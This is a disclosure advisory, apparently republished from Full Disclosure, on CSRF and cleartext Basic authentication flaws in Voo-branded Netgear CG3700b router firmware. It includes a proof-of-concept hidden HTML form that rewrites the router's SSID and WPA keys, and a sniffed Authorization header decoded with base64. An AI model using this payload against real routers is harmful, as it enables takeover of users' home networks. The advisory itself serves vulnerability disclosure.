Voo Branded Netgear CG3700b Firmware CSRF / Authentication

2016.04.28
Credit: dev
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

CVEs pending, screenshots and further examples available soon on my site. Cross-Site Request Forgery (CSRF) on all form POSTs --------------------------------------------------------------------------------- The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03) allows a (context-dependent) attacker to perform a Cross-Site Request Forgery (CSRF) attack on all configuration setting (/goform/<settingspage>) page POST requests. By tricking a user into following a specially crafted link, an attacker can modify all settings including WEP/WPA/WPA2 keys, restore the router to factory settings, or even upload an entire malicious configuration file. Example: <form method="POST" name="form0" action="http://192.168.0.1/goform/index" <input type="hidden" name="group_parametrage_wifi" value="active"> <input type="hidden" name="reseau_wifi_name" value="NEWSSID"> <input type="hidden" name="nom_select" value="AUTO-PSK"> <input type="hidden" name="canal" value=0> <input type="hidden" name="mot_de_passe" value="NEWWPAKEY"> <input type="hidden" name="NBandwidth" value=20> <input type="hidden" name="group_parametrage_wifi_an" value="active"> <input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G"> <input type="hidden" name="nom_select_an" value="AUTO-PSK"> <input type="hidden" name="canal_an" value=0> <input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G"> <input type="hidden" name="NBandwidth_an" value=20> <input type="hidden" name="group_fon" value="desactiver"> <input type="hidden" name="buttonApply" value=1> <input type="hidden" name="only_mode" value=0> <input type="hidden" name="selected_ch_an" value=1> </form> Insufficient Authentication (OWASP-A2) ----------------------------------------------------------- This same modem handles authentication via basic authentication over the default (HTTP, non-ssl) connection. This allows an attacker to easily decode the base64 encoded username and password, and authenticate to the router. This only requires an attacker be on the same network as the router, and sniff the clear-text traffic. Example: POST http://192.168.0.1/goform/parametre_config HTTP/1.1 Host: 192.168.0.1 Connection: keep-alive Content-Length: 24721 Cache-Control: max-age=0 Authorization: Basic dm9vOlBBU1NXT1JE root@kali:~# cat voo.txt dm9vOlBBU1NXT1JE root@kali:~# base64 --decode voo.txt voo:PASSWORD Disclosure Timeline ----------------------------- 22 Jan - discovered vulnerability, initially notified vendor 23 Jan - requested CVE 7 Mar - contacted vendor again, was notified that this will not be fixed at this time 20 April - attempted to contact Mitre again to receive CVE 21 April - sent to Full Disclosure 23 April - additional information (tentatively) posted to http://www.doyler.net 26 April - resending to Full Disclosure due to some errors


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top